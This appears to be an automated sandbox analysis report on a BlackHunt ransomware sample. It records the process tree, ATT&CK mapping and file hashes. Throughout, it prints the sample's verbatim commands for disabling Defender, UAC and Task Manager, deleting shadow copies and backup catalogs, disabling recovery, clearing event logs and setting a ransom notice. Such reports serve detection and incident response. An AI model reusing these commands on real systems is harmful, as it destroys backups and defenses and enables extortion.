bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 55 PID 3040 wrote to memory of 2460 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 55 PID 3040 wrote to memory of 2460 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 55 PID 3040 wrote to memory of 2460 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 55 PID 2572 wrote to memory of 2568 2572 cmd.exe 53 PID 2572 wrote to memory of 2568 2572 cmd.exe 53 PID 2572 wrote to memory of 2568 2572 cmd.exe 53 PID 3040 wrote to memory of 1816 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 52 PID 3040 wrote to memory of 1816 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 52 PID 3040 wrote to memory of 1816 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 52 PID 3040 wrote to memory of 1816 3040 bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe 52 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe"C:\Users\Admin\AppData\Local\Temp\bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3040 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2480
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2624
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2520
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵
- Modifies registry class
PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2544
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2428
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2752
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3060
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1828
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1672
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1784
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1880
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2492
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe" /F2⤵PID:1512
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe" /F3⤵
- Creates scheduled task(s)
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2712
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2792 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1072
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2064
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2104
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2260
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2036
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:772
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:540
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1320
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1636
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:1568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:224
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3364
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3460
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:4100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4148
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:536
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2924
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\bdc3346a9bc704d36c83e056a331ec994a2182fe9ed2cb843ed2f0ef6102198c.exe"2⤵
- Deletes itself
PID:4208 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:4116
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:4212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3952
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:688
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:3352
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3808
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:2744
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1704
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2684
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3152
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:4348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1048
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:540
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1664
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:912
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:4512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:4520
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2792
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4028
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1560
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:2208
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:1516
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:3468
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4324
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4332
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4372
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5b9bba1c306e40523d63d5c2308850fcf
SHA1026133b6af818c0c37b787a03677b907dba3f433
SHA2568365ff2fbf3fecd215a147e12b901409083c760277cb97be0656657e640a4e17
SHA512ede5a151dfd80ee9b71d80ddb33e7d31c31483695f00c7f95ea3af042d1c058b4c090aed6d12ea1318aa8ba933e4252894b8848c171df7ee75c962eeb7c2116e
-
Filesize
12KB
MD5b41c76617fb7fde73d07bb8c50b8233a
SHA1cda8276e0b4a2297f8eefd3076e14b4f08e3ccb1
SHA256258b56b3e049094a3029e534aaefae6bc0a4d4221ea8e03b1cbae9714905cbb3
SHA5122b0df59039a43d6aafe32febf25eec4a8bf3af428328965a42c37e24d6a36b168df1fe5e57bfd716589cc0d4f84bf5674f30974c67a6a972d2cfe8dadb9a92f2
-
Filesize
684B
MD59f881895bb7de1265a8bd72df7acfa44
SHA199dbeb405d7cb25c3a43e3a6639d3901c7f53b34
SHA25645a3a2f139f34452269496175d807290ac18e60a21c8a7003b97ae55f578edc2
